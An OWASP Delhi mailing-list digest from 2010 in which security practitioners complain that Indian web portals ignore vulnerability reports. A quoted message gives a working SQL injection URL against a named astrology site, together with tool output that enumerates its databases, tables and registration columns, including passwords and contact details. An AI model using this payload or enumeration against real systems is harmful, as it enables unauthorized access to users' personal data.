[Owasp-delhi] Owasp-delhi Digest, Vol 35, Issue 9

subhasis subha83 at gmail.com
Wed Jun 16 03:41:37 EDT 2010


As responsible infosec people, every time we try to wake up the management of these big
industries (government/private/public), they feel that their jobs are permanent and
secure, and so are their web servers and applications.

They are very careless about taking the necessary security measures even after proof
of vulnerability, and sometimes they forget to reply.

In India, 78% of all companies or sectors believe "we are secure because no
one is attacking". They have one more strong belief: "It is easier to
show 'site under maintenance' and restore all hacked data from backup than to put
security in place to protect that data".

Indirectly, they themselves are responsible for singing to US/Chinese/Russian
hackers the song "come, play and win (hack) our valuable national websites".

With regards,

subhasis
On Wed, Jun 16, 2010 at 2:48 PM, <owasp-delhi-request at lists.owasp.org> wrote:

> Send Owasp-delhi mailing list submissions to
>        owasp-delhi at lists.owasp.org
>
> To subscribe or unsubscribe via the World Wide Web, visit
>        https://lists.owasp.org/mailman/listinfo/owasp-delhi
> or, via email, send a message with subject or body 'help' to
>        owasp-delhi-request at lists.owasp.org
>
> You can reach the person managing the list at
>        owasp-delhi-owner at lists.owasp.org
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Owasp-delhi digest..."
>
>
> Today's Topics:
>
>   1. Re: Rediff Astrology (Subhash Dutta)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Wed, 16 Jun 2010 09:08:45 +0530 (IST)
> From: Subhash Dutta <subhash.dutta at kriss.in>
> Subject: Re: [Owasp-delhi] Rediff Astrology
> To: Sripathi Krishnan <sripathi.krishnan at gmail.com>
> Cc: owasp-delhi <owasp-delhi at lists.owasp.org>
> Message-ID: <[email protected]>
> Content-Type: text/plain; charset="utf-8"
>
> Yes, I have also noted the same. In fact, the imint card company stores
> passwords reversibly encrypted and will tell you in plain text what your
> password is in case you have forgotten it ;). When brought to their notice,
> I received a standard reply - "Thanks for contacting us, we will get back
> to you shortly." Nobody has got back to date (1 year on). I think strong
> legislative punitive measures are the only solution.
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>
> Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
> owasp-bangalore at lists.owasp.org
> Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: Re: [Owasp-delhi] Rediff Astrology
>
> It's not just rediff.com; almost all other Indian portals - in.com,
> indiatimes.com and sify.com - have similar problems. XSS, XSRF, SQL
> injection, poor password/session management, open redirects .. the list is
> endless.
>
>
> I have written to each of the above portals several times in the past year,
> and have given up. IMHO, they are not interested in securing their websites.
>
>
>
>
> --Sri
>
>
>
> On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:
>
>
>
>
>
>
> Another one to notify Rediff that readers' daily fortune can be fixed by
> someone. Seems Rediff needs a lot of OWASP; do inform them that it's free!!
>
>
>
>
> From: "Jack H4xor"
> Sent: 14 June 2010 12:07
> To: dhruv.soi at owasp.org
> Subject: Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
> ********************************************************************
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> + -== MSSQL Information Schema astrology.rediff.com ==- +
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
> [ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox'
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
> [ + ] Displaying information about MSSQL host !
>
> [ + ] @@VERSION        : Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
>
> Aug  6 2000 00:57:48
> Copyright (c) 1988-2000 Microsoft Corporation
> Standard Edition on Windows NT 5.0 (Build 2195: Service
> Pack 4)
>
> [ + ] USER ()          : dbo
>
> [ + ] S_USER ()        : astrology
> [ + ] DB_NAME ()       : astro
> [ + ] HOST_NAME ()     : ASTROLOGY
> [ + ] SERVER_NAME ()   : SEARCHDB
> [ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
> [ + ] X-POWERED-By ()  : ASP.NET
>
> [ + ] IP_ADDRESS_INFO  : 202.54.124.173
>
>
> [ - ] We Can't get number of Databases !
>
>
> [ ! ] Start dumping database Names !
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
> [ DATABASE : 0 ] : astro
>
> [ DATABASE : 1 ] : master
>
> [ DATABASE : 2 ] : tempdb
>
> [ DATABASE : 3 ] : model
>
> [ DATABASE : 4 ] : msdb
>
> [ DATABASE : 5 ] : pubs
>
> [ DATABASE : 6 ] : Northwind
>
> [ DATABASE : 7 ] : travel
>
> [ DATABASE : 8 ] : travel_int
>
> [ DATABASE : 9 ] : astro
>
> [ DATABASE : 10 ] : Jobsearch
>
> [ DATABASE : 11 ] : astroyogiD
>
> [ DATABASE : 12 ] : matrimonial
>
> [ DATABASE : 13 ] : investornew
>
> [ DATABASE : 14 ] : test
>
>
> [ ! ] Vulnerability Database is : astro
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
> [ + ] Specify Numbers :> 200
>
>
> [ TABLES : 0 ] : ALLIANCE_PARTNER_COMMISSION
>
> [ TABLES : 1 ] : ALLIANCE_PARTNER_MASTER
>
> [ TABLES : 2 ] : astrolove
>
> [ TABLES : 3 ] : astroparent
>
> [ TABLES : 4 ] : CITY
>
> [ TABLES : 5 ] : COMPLETE_ORDER_DETAIL
>
> [ TABLES : 6 ] : COMPLETE_SUBSCRIPTION_DETAIL
>
> [ TABLES : 7 ] : COUNTRY
>
> [ TABLES : 8 ] : CUSTOMER_CARE_DETAILS
>
> [ TABLES : 9 ] : CUSTOMER_CARE_MASTER
>
> [ TABLES : 10 ] : CUSTOMER_PERSON1
>
> [ TABLES : 11 ] : CUSTOMER_PERSON2
>
> [ TABLES : 12 ] : CUSTOMER_PERSON3
>
> [ TABLES : 13 ] : darshtest
>
> [ TABLES : 14 ] : dtproperties
>
> [ TABLES : 15 ] : FENGSHUI
>
> [ TABLES : 16 ] : FRANCHISEE_MASTER
>
> [ TABLES : 17 ] : idealmate
>
> [ TABLES : 18 ] : INTERNATIONAL_PARTNER_MASTER
>
> [ TABLES : 19 ] : NUMEROLOGY
>
> [ TABLES : 20 ] : ORDER_DETAILS
>
> [ TABLES : 21 ] : ORDER_MASTER
>
> [ TABLES : 22 ] : ORDER_REMARKS
>
> [ TABLES : 23 ] : ORDERS
>
> [ TABLES : 24 ] : p1
>
> [ TABLES : 25 ] : p3master
>
> [ TABLES : 26 ] : PALMISTRY
>
> [ TABLES : 27 ] : PAYMENT_METHOD_MASTER
>
> [ TABLES : 28 ] : PROBLEM_ANSWER
>
> [ TABLES : 29 ] : PROBLEM_CATEGORY
>
> [ TABLES : 30 ] : REGISTRATION
>
> [ TABLES : 31 ] : SHIPPING_DETAILS
>
> [ TABLES : 32 ] : SPCFIC_ANLYS
>
> [ TABLES : 33 ] : SUBSCRIBER_DETAILS
>
> [ TABLES : 34 ] : SUBSCRIBER_MASTER
>
> [ TABLES : 35 ] : SUBSCRIBER_REGISTRATION
>
> [ TABLES : 36 ] : SUBSCRIBER_TRANSACTION
>
> [ TABLES : 37 ] : SUBSCRIPTION_DETAILS
>
> [ TABLES : 38 ] : SUBSCRIPTION_MASTER
>
> [ TABLES : 39 ] : sysconstraints
>
> [ TABLES : 40 ] : syssegments
>
> [ TABLES : 41 ] : test
>
> [ TABLES : 42 ] : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
> [ TABLES : 43 ] : zodiac
>
>
> [ + ] Done !
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
> [ ? ] Numbers of Columns To Display ?
>
> [ + ] Specify Numbers :> 50
>
>
> [ + ] Displaying 50 Columns inside Table : REGISTRATION and Database :
> astro
>
>
> [ COLUMNS : REGISTRATION ] 0 ] : FRANCHISEE_ID
>
> [ COLUMNS : REGISTRATION ] 1 ] : PARTNER_ID
>
> [ COLUMNS : REGISTRATION ] 2 ] : REGISTRATION_ADDRESS
>
> [ COLUMNS : REGISTRATION ] 3 ] : REGISTRATION_BIRTH_COUNTRY
>
> [ COLUMNS : REGISTRATION ] 4 ] : REGISTRATION_BIRTH_DATE
>
> [ COLUMNS : REGISTRATION ] 5 ] : REGISTRATION_BIRTH_PLACE
>
> [ COLUMNS : REGISTRATION ] 6 ] : REGISTRATION_BIRTH_TIME_HOUR
>
> [ COLUMNS : REGISTRATION ] 7 ] : REGISTRATION_BIRTH_TIME_MINUTES
>
> [ COLUMNS : REGISTRATION ] 8 ] : REGISTRATION_CELL_NO
>
> [ COLUMNS : REGISTRATION ] 9 ] : REGISTRATION_COUNTRY
>
> [ COLUMNS : REGISTRATION ] 10 ] : REGISTRATION_DATE
>
> [ COLUMNS : REGISTRATION ] 11 ] : REGISTRATION_EMAIL_ID
>
> [ COLUMNS : REGISTRATION ] 12 ] : REGISTRATION_FIRSTNAME
>
> [ COLUMNS : REGISTRATION ] 13 ] : REGISTRATION_GENDER
>
> [ COLUMNS : REGISTRATION ] 14 ] : REGISTRATION_ID
>
> [ COLUMNS : REGISTRATION ] 15 ] : REGISTRATION_IP
>
> [ COLUMNS : REGISTRATION ] 16 ] : REGISTRATION_LASTNAME
>
> [ COLUMNS : REGISTRATION ] 17 ] : REGISTRATION_PASSWORD
>
> [ COLUMNS : REGISTRATION ] 18 ] : REGISTRATION_TELEPHONE_NO
>
> [ COLUMNS : REGISTRATION ] 19 ] : REGISTRATION_USERNAME
>
>
> [ ! ] Done !
>
>
> [ ! ] All information was recorded in astrology.rediff.com.txt file !
>
>
> [ 1 ] : Return to Tables !
>
> [ 2 ] : Return to Columns !
>
>
> [ ? ] : Oprion :>
>
>
>
> Thanks & Regards
> Jackh4xor
> ( h4cky0u )
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
>
> ------------------------------
>
>
>
> End of Owasp-delhi Digest, Vol 35, Issue 9
> ******************************************
>